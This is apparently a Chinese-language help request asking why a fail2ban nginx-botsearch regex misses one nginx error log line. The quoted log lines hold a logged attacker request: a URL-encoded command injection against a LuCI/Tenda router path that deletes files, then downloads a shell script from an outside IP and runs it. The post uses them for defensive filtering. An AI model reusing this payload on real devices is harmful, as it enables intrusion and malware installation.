在我的fail2ban配置中,过滤器nginx-botsearch.conf(Ubuntu 22.04.4 LTS 附带的过滤器)被激活。
请帮助我调试正则表达式的行为
^ \[error\] \d+#\d+: \*\d+ (\S+ )?\"\S+\" (failed|is not found) \(2\: No such file or directory\), client\: <HOST>\, server\: \S*\, request: \"(GET|POST|HEAD) \/<block> \S+\"\, .*?$
这个正则表达式确实捕获了这些日志行:
2024/05/08 13:00:40 [error] 637#637: *7255 open() "/var/www/html/node01c/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 80.94.92.60, server: node-c.myhost.com, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1", host: "20.208.129.142"
2024/05/08 13:00:40 [error] 637#637: *7255 open() "/var/www/html/node01c/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 80.94.92.60, server: node-c.myhost.com, request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1", host: "20.208.129.142"
但无法匹配这一行(非常相似):
2024/05/08 11:55:04 [error] 637#637: *7233 open() "/var/www/html/node01c/new/.git/config" failed (2: No such file or directory), client: 31.7.62.226, server: node-c.myhost.com, request: "GET /new/.git/config HTTP/1.1", host: "20.208.129.142"
尝试使用一些在线工具对其进行调试并不能突出任何特定原因。